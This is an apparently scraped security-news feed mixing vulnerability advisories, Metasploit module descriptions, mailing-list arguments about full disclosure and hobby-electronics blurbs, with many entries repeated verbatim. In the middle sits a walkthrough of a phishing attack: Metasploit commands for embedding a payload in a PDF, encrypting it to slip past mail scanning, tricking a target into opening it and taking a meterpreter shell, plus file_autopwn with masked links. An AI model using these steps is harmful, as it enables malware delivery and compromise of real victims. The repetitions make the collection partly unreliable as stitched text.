Secunia Security Advisory - Ubuntu has issued an update for linux. This fixes multiple weaknesses and vulnerabilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service), disclose certain system and potentially sensitive information, bypass certain security restrictions, and gain escalated privileges and by malicious people to cause a DoS.

Secunia Security Advisory - Red Hat has issued an update for seamonkey. This fixes multiple vulnerabilities, which can be exploited by malicious people to conduct cross-site request forgery attacks and compromise a user's system.

Secunia Security Advisory - Red Hat has issued an update for the kernel. This fixes a weakness and some vulnerabilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and to disclose system information and by malicious people to cause a DoS.

Secunia Security Advisory - Ubuntu has issued an update for linux and linux-ec2. This fixes multiple weaknesses, a security issue and multiple vulnerabilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service), disclose certain system and potentially sensitive information, bypass certain security restrictions, and gain escalated privileges and by malicious people to cause a DoS.

Secunia Security Advisory - Multiple vulnerabilities have been reported in Moodle, which can be exploited by malicious users to conduct script insertion attacks and bypass certain security restrictions and by malicious people to disclose certain sensitive information and conduct cross-site scripting or cross-site request forgery attacks.

Secunia Security Advisory - Debian has issued an update for pango1.0. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise an application using the library.

Secunia Security Advisory - SUSE has issued an update for tomcat6. This fixes multiple vulnerabilities, which can be exploited by malicious, local users to bypass certain security restrictions and by malicious people to conduct cross-site scripting attacks and cause a DoS (Denial of Service).

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from "main" within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the "getProxiedStorageAddress" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from "main" within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the "getProxiedStorageAddress" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from "main" within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the "getProxiedStorageAddress" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the "main" function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the "main" function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the "main" function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

This Metasploit module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution.

This Metasploit module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution.

This Metasploit module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution.

This Metasploit module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted ICount parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

This Metasploit module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted ICount parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

This Metasploit module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted ICount parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the "snmpviewer.exe" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within the a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the "snmpviewer.exe" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within the a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the "snmpviewer.exe" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within the a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold.

This Metasploit module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

This Metasploit module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

This Metasploit module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

Debian Linux Security Advisory 2201-1 - Huzaifa Sidhpurwala, Joernchen, and Xiaopeng Zhang discovered several vulnerabilities in the Wireshark network traffic analyzer. Vulnerabilities in the DCT3, LDAP and SMB dissectors and in the code to parse pcag-ng files could lead to denial of service or the execution of arbitrary code.

Debian Linux Security Advisory 2201-1 - Huzaifa Sidhpurwala, Joernchen, and Xiaopeng Zhang discovered several vulnerabilities in the Wireshark network traffic analyzer. Vulnerabilities in the DCT3, LDAP and SMB dissectors and in the code to parse pcag-ng files could lead to denial of service or the execution of arbitrary code.

Debian Linux Security Advisory 2201-1 - Huzaifa Sidhpurwala, Joernchen, and Xiaopeng Zhang discovered several vulnerabilities in the Wireshark network traffic analyzer. Vulnerabilities in the DCT3, LDAP and SMB dissectors and in the code to parse pcag-ng files could lead to denial of service or the execution of arbitrary code.

Debian Linux Security Advisory 2200-1 - This update for Iceweasel, a web browser based on Firefox, updates the certificate blacklist for several fraudulent HTTPS certificates. More details can be found in a blog posting by Jacob Appelbaum of the Tor project.

Debian Linux Security Advisory 2200-1 - This update for Iceweasel, a web browser based on Firefox, updates the certificate blacklist for several fraudulent HTTPS certificates. More details can be found in a blog posting by Jacob Appelbaum of the Tor project.

Debian Linux Security Advisory 2200-1 - This update for Iceweasel, a web browser based on Firefox, updates the certificate blacklist for several fraudulent HTTPS certificates. More details can be found in a blog posting by Jacob Appelbaum of the Tor project.

Core Security Technologies Advisory - Two vulnerabilities have been found in VLC media player, when handling .AMV and .NSV file formats. These vulnerabilities can be exploited by a remote attacker to obtain arbitrary code execution with the privileges of the user running VLC. Versions 1.1.4 through 1.1.7 are affected.

Core Security Technologies Advisory - Two vulnerabilities have been found in VLC media player, when handling .AMV and .NSV file formats. These vulnerabilities can be exploited by a remote attacker to obtain arbitrary code execution with the privileges of the user running VLC. Versions 1.1.4 through 1.1.7 are affected.

Core Security Technologies Advisory - Two vulnerabilities have been found in VLC media player, when handling .AMV and .NSV file formats. These vulnerabilities can be exploited by a remote attacker to obtain arbitrary code execution with the privileges of the user running VLC. Versions 1.1.4 through 1.1.7 are affected.

Brief Overview
This screencast demonstrates vulnerabilities in Adobe PDF Reader. Instead of creating a mass of vulnerable files , the attacker creates two PDFs (One relies on no user interaction and crashes the reader whereas the other one require the user to click through a few warning screens, however is then presented with a document).

The attacker emails these documents to the target (however has to compress & encrypt the documents).

What do I need?
* Metasploit – (Can be found on BackTrack 4-R2). Download here
* SendEmail + SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
* A PDF document (Either create your own or can be found by using a Internet search engine). * The target will need a vulnerable version of Adobe Reader (v9.3 for example). Download here

Method
* Start network services and obtain an IP address
* Run metasploit and search for PDF exploits
* Configure exploit and create a vulnerablefile
* Compress and encrypt PDF
* Socially engineer an email to the target and attach file
* Wait for target to download and open file
* Game Over
* Locate a "legit" PDF documentand bind with exploit
* Compress and encrypt PDF document
* Socially engineer an email to the target and attach file
* Wait for target to download and open file
* Game Over ...again

use windows/fileformat/adobe_pdf_embedded_exe
info
show options
set FILENAME evil2.pdf
#set EXENAME evil.exe #ENCODE
set LAUNCH_MESSAGE Be sure to re-save when shown and then click open.
set INFILENAME /root/good.pdf
show options
exploit
use exploit/multi/handler
show options
exploit -j

sessions -l -v
sessions -i 2
sysinfo
getuid
getsystem
getuidWalk-through
The attacker approaches this attack similar to a previous method, however instead of producing a collection of different files, which are not going to be used, they choose to use a program which is very commonly installed (also not updated often too!), Adobe Reader.

To start things going, the attacker starts their network connection and runs metasploit. When metasploit is ready, they search it's database for known exploits for PDFs files. "windows/fileformat/adobe_libtiff" has the latest Disclosure Date (2010-02-16) to today's date (2011-03-22). After choosing it and looking at the exploit in more detail, the attacker notes the vulnerable version of Adobe Reader (versions 8.0 - 8.2, 9.0 - 9.3) which the target HAS to have for this exploit to work.

The attacker then proceeds to enter all the necessary information for the exploit to function, then creates the exploit when it is ready.

Like before, the attacker chooses to social engineer the target by sending them an email, however this time around wants to attach the file instead of linking to it.
The attacker enters a brief description of what the PDF is meant to contain. However, when the attacker tries to see the PDF the SMTP disallowed the PDF attachment. The attacker compresses and encrypts the PDF which will prevent detection (The attacker alters the original message to include what the password is).

The attacker can sit back and relax until the target opens the PDF document... Which the target does =). However! When the target opens the PDF document, the reader "crashes" before they could read the document. So they email back saying they are unable to read it. The attacker then replies with the "correct" PDF...

Again, the attacker then process to enter all the necessary information for the exploit to function, creates the new document and delivers it using the same method as before. Just like before, there is nothing left for the attacker to do expect to wait for the target to open the document...

After the target has refreshed their inbox, they notice they have got the "correct" PDF. Upon opening the file, a "Save as" window pops up (1), and of course they wish to save the PDF or just want to read the document so they just click next... After reading the message (2), then click on "open". After doing those steps the target is able to read the document...

...meanwhile the exploit has worked and the attacker has another meterpreter shell on the targets machine.

(1) This is really a meterpreter agent, NOT the PDF file which it says it was. It has cloned the filename from the PDF the attacker used(2) The message is what the attacker left ;)

What do I need?
* Metasploit – (Can be found on BackTrack 4-R2). Download here
* SendEmail + SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
* URL shorter service – (Can be found by using a Internet search engine).

Method
* Start network services and obtain an IP address
* Start metasploit and configurefile_autopwn
* Wait for web server to be active
* Browser available files and view information of that particular one.
* Discover homepage and download information
* Create masked URLs
* Socially engineer a email to the target with all the information
* Wait for target to download the file and load it in the program
* Game Over

sessions -l -v
sessions -i 1
sysinfo
getuid
getsystem
getuidWalk-through
The attacker approaches this attack differently by attacking desktop application installed on the operating system (OS) by using a collection of “file exploits”.

To start things, the attacker starts metasploit and locates the file_autopwn module. After examining the required information, the attacker process with entering all the details which are needed. Once this has been done, the attacker sets metasploit to work by creating a mass of vulnerable files after which have been created metasploit set ups a web server which is the going to be used for the delivery method.

The attacker visits the web server themselves to see what is available. After choosing the program "fatplayer", they decided to increase there chance of success by finding the program's homepage so they can pass this information on to the target, which makes it "nice and easy" for the target to download and run.
The attacker needs to make sure that they send a vulnerable version of the program to the target however, so they check to see what information is given about the file exploit.

The attacker chooses to social engineer the target by sending them a email with a link to the file, setup and a brief description. To help increase success, the attacker masks the URL of both files by using URL shorting services. Once the target clicks on the shorten link, they are automatically redirected to the "longer URL".

The attacker just has to simply wait to see if the target "falls for it" and runs the exploit file.... Which the target does. =)

Notes:
* You will need to find/use your own SMTP details.
* You can use any number of URL shorting services.
* You could of used any files generated by metasploit.
* You could of attach the file instead of linking in the email (See here for a example), however alot of email services now have anti-virus checking built in...

Brief Overview Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any mean possible. This is the second video on it, first one here. Unlike last time, the entry method was via a samba weakness method which is a quick attack and straight to root.

Walkthrough
A quick general nmap scan shows what hosts are on the network currently, before doing a more detailed scan on the target (192.168.0.111). By doing this, nmap shows what possible services (ports) the target has running and their versions as well as trying to identify the operating system (OS). The result of this is:
* OS: Linux v2.4.x (2.4.9-18)
* Samba: Samba smbd (wordgroup: MYGROUP)

The next stage was to test to make sure that samba was functioning correctly. By using smbclient, the attacker lists all services which are available on a target. The result being:
* Anonymous login
* Hostname (KIOPTRIX)
* Workgroup (MYGROUP)
* Defautl hidden admin shares (IPC$, ADMIN$)

The attacker process begins by starting up metasploit and searching for a known exploit. After configuring all the settings required, the attacker launches it. Very soon afterwards the attacker has a remote shell, with "root" access to the system.

[Ed] had a netbook he no longer needed and decided to make it into a mini MAME cabinet for some of his family members. MAME cabinets are pretty plentiful, but this one was so nicely done, we wanted to share it. He removed the monitor from an EeePC 901 in order to get some precise [...]

[Ben Krasnow] has recently completed a home-built scanning electron microscope and has posted a video of it in action on his blog. The build itself was done quite creatively using many off-the shelf components. We particularly like how long threaded brass rods were used not only for the supports, but also to maintain column alignment [...]

re: """The IP address of the initial attack was recorded and has been
determined to be assigned to an ISP in Iran. A web survey revealed one
of the certificates deployed on another IP address assigned to an
Iranian ISP. The server in question stopped responding to requests
shortly after the certificate was revoked....
While the involvement of two IP addresses assigned to Iranian ISPs is
suggestive of an origin, this may be the...

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusersmsf auxiliary(snmp_enumusers) > info...SNIP...Description: This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusersmsf auxiliary(snmp_enumusers) > info...SNIP...Description: This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

SCADA systems are infamous for being terribly insecure. (You can search
the internet for demonstration video of equipment catching fire because
of such bugs.) SCADA manufacturers seem to have a firewall mentality
that excuses them from needing to be secure.

I am not at all surprised to see these bugs, though I do cringe at how
embarrassing they are. Heaping some embarrassment on the vendors seems
well deserved.

[Akiba] and the crew at Tokyo Hakerspace are still hard at work trying to help out their fellow countrymen after the recent earthquake, tsunami, and ongoing nuclear crisis in Japan. You may remember the group as they are behind the Kimono Lantern project we featured last week. This time around, their efforts are focused on [...]

1 - Full disclosure
2 - Publically, the vendor looks bad to customers
3 - A fix is crafted immediately; tested rapidly, then released to
customers.
4 - Publically, customer and vendor would look bad if they did not
install the fix immediately -- as soon as it is available

I am very well aware of what is going on out there in industry:
Customers do not install patches unless...

Actually they have the choice to not run SCADA systems open to the
Internet. If they are so critical that you are "playing with fire" like
you mentioned in another email, why would they be accessible via script
kiddie attack, or any remote over-the-tubes attack? Running SCADA
systems open to the entire Internet is what I would call irresponsible.

At this point, it is academic anyway. The cat is out of the bag. Thanks
Luigi, I at...

no problem, if you don't agree with full-disclosure or how I and the
other researchers like me handle these security vulnerabilities you have
the full power and freedom of finding them by yourself and handling them
as you desire.

so now the question is, why don't all these "good guys" spend their
personal time and skills to find these vulnerabilities and reporting
them to the vendors before me?

The PHP-Nuke version 8.x and lower are vulnerable to Cross Site Scrtipting.

2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page, access...

You're flawed in your response: "Public exposure increases the
visibility, and therefore customersinstall the patches quicker." ...
When someone "full discloses" a vulnerability, there is no patch to
install quicker. This is obvious because there is no patch until either
the vendor releases one, or staff using the product are capable of
creating a work-around. In the case of the SCADA environment, we (again)
are not talking...

[Will Jack] built a heavy water fusion reactor and then won district and regional science fair projects with it. Someone give this man a job! We looked in on his fusion reactor about a year ago. At the time he had managed to build a magnetic containment field but didn’t have the voltages or the [...]

The administration backend of PHP-Nuke 8.x is vulnerable to Blind SQL Injection.

2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page,...

You stated: "usually such people don't have the skills" Humor me and
others on this list why don't you... Reported to CERT two days ago:

Vulnerability Report
Vulnerability Description Over 300 ActiveX based vulnerabilities have
been discovered on multiple VMWare Server applications. Vulnerabilities
range from denial of service attacks to full control of EIP which can
lead to code execution
Vulnerability Impact Attacker can trigger code...

First; while I agree with your statement regarding the overuse of car analogies, the comparison is accurate and fair in
this case. The vendor's customers are now potentially at greater risk because of this announcement that includes no
mitigation.

Second; I fundamentally disagree with the idea that public disclosure as a means of vendor notification serves any
purpose beyond tooting one's own horn and causing a panic state for the...

[Viktor] decided to replace his old power hungry home server with a model that is much easier on the old electric bill. The new motherboard uses an Intel Atom chip and consumes far less power than its predecessor. He figured there was no reason to use a bulky ATX power supply when all he needed [...]

The Progea Movicon 11 TCPUploadServer allows remote users to execute functions on the server without any form of authentication. Impacts include deletion of arbitrary files, execution of a program with an arbitrary argument, crashing the server, information disclosure, and more. This design flaw puts the host running this server at risk of potentially unauthorized functions being executed on the system.

The Progea Movicon 11 TCPUploadServer allows remote users to execute functions on the server without any form of authentication. Impacts include deletion of arbitrary files, execution of a program with an arbitrary argument, crashing the server, information disclosure, and more. This design flaw puts the host running this server at risk of potentially unauthorized functions being executed on the system.

The Progea Movicon 11 TCPUploadServer allows remote users to execute functions on the server without any form of authentication. Impacts include deletion of arbitrary files, execution of a program with an arbitrary argument, crashing the server, information disclosure, and more. This design flaw puts the host running this server at risk of potentially unauthorized functions being executed on the system.

You appear to assume that because no one else has reported these vulns
publicly that no one else has discovered them. This is false logic; proof
is not satisfied by a lack of evidence to the contrary.
To be clear, I do appreciate researchers who spend their time seeking and
reporting security issues and sometimes "just bugz" in vendor software -
it's this sort of independent scrutiny that keeps the vendors honest and on
their toes....

There are multiple remote uninitialized pointer free conditions in IGSS's ODBC server. By sending a specially crafted packet to listening port 20222, it is possible to crash the server. Execution of arbitrary code is unlikely.

There are multiple remote uninitialized pointer free conditions in IGSS's ODBC server. By sending a specially crafted packet to listening port 20222, it is possible to crash the server. Execution of arbitrary code is unlikely.

There are multiple remote uninitialized pointer free conditions in IGSS's ODBC server. By sending a specially crafted packet to listening port 20222, it is possible to crash the server. Execution of arbitrary code is unlikely.

That's fine, but the controversy around the proper mode of disclosure
is here to stay. For every good argument you make, there is an equally
compelling counter-argument that other reasonable people believe in
good faith. It really comes down to personal beliefs, and nothing has
changed here in the past 15 years or so.

Any of us can disagree, but lashing out against other people seems
first of all impolite, and second, somewhat amusing on this...

Zero Day Initiative Advisory 11-112 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Data Protector. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DBServer.exe process which listens by default on TCP port 19813. While parsing a request, the process trusts a user-supplied 32-bit length value and uses it within a memory operation. By specifying large enough values in a packet sent to the service, a remote attacker can execute arbitrary code under the context of the SYSTEM user.

Zero Day Initiative Advisory 11-112 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Data Protector. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DBServer.exe process which listens by default on TCP port 19813. While parsing a request, the process trusts a user-supplied 32-bit length value and uses it within a memory operation. By specifying large enough values in a packet sent to the service, a remote attacker can execute arbitrary code under the context of the SYSTEM user.

Zero Day Initiative Advisory 11-112 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Data Protector. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DBServer.exe process which listens by default on TCP port 19813. While parsing a request, the process trusts a user-supplied 32-bit length value and uses it within a memory operation. By specifying large enough values in a packet sent to the service, a remote attacker can execute arbitrary code under the context of the SYSTEM user.

Zero Day Initiative Advisory 11-111 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Virtual SAN appliance. Authentication is not required to exploit this vulnerability. The flaw exists within the hydra.exe component which listens by default on port 13838. When parsing a login request the Hydra daemon will call sscanf() using fixed-length stack buffers and no length checks. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM service.

Zero Day Initiative Advisory 11-111 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Virtual SAN appliance. Authentication is not required to exploit this vulnerability. The flaw exists within the hydra.exe component which listens by default on port 13838. When parsing a login request the Hydra daemon will call sscanf() using fixed-length stack buffers and no length checks. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM service.

Zero Day Initiative Advisory 11-111 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Virtual SAN appliance. Authentication is not required to exploit this vulnerability. The flaw exists within the hydra.exe component which listens by default on port 13838. When parsing a login request the Hydra daemon will call sscanf() using fixed-length stack buffers and no length checks. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM service.

While I support full disclosure, I also advocate responsible disclosure. The public _has_ a right to know, but in this
case, they can play no significant part in remedy or mitigation unless they are employees of the vendor or the
customer. I believe the best course of action for a SCADA vulnerability would be to let the vendor know first, let
them know you intend to disclose publicly after a reasonable time, then release to the potential...

I and another research fellow, AlanH0, who have carried out basic Web vulnerability digging over 80 companies including government, banks and listed companies in Hong Kong. We would like to see whether they have done their webapp security "homework" well since 2004 (i.e. OWASP Top 10 vulnerabilities are published). Amazingly, we have found over 120 basic vulnerabilities out of 90 organizations.

Did they still stay in a stone age that simply trust the scanner with "no risk", feeling secure and safe afterwards?
Did they get right party for penetration test?
Did they still believe in only CISSP could be the penetration tester?
Did they engage any secure software and system development lifecycle?
Did their developers get training regularly?

Does the image of the clock above make you shutter with fear because of the math you’d need to use to recreate your own version of the project? We certainly understand that High School geometry is becoming a very distant memory, but it’s really not as hard as you think. [Janw] built this analog clock [...]

The Open Source Hardware (OSHW) initiative is rolling right along. But now it’s time for you to share your input. The movement is choosing a logo and you get to decide which one it will be. The ten finalists shown above were narrowed down from the 129 submissions received during the public call for logos. [...]

Instructables user [Bruno] recently constructed a fun little toy that brings a bit of the Mario nostalgia out of the video game universe and into ours. His Super Mario coin block is instantly recognizable from the first Mario game and performs just as you would expect it to. Punching or tapping the bottom of the [...]

Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.

Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.

Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.

This image was not made in post production, but captured during a long camera exposure. The method uses stencils to add components to a picture. [Alex] built a jig for his camera from a cardboard box. This jig positions a large frame in front of the camera lens where a printed stencil can be inserted. [...]

The PHP-Nuke version 8.x and lower are vulnerable to Cross Site Scrtipting.

2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page, access...

The administration backend of PHP-Nuke 8.x is vulnerable to Blind SQL Injection.

2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page,...

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming...

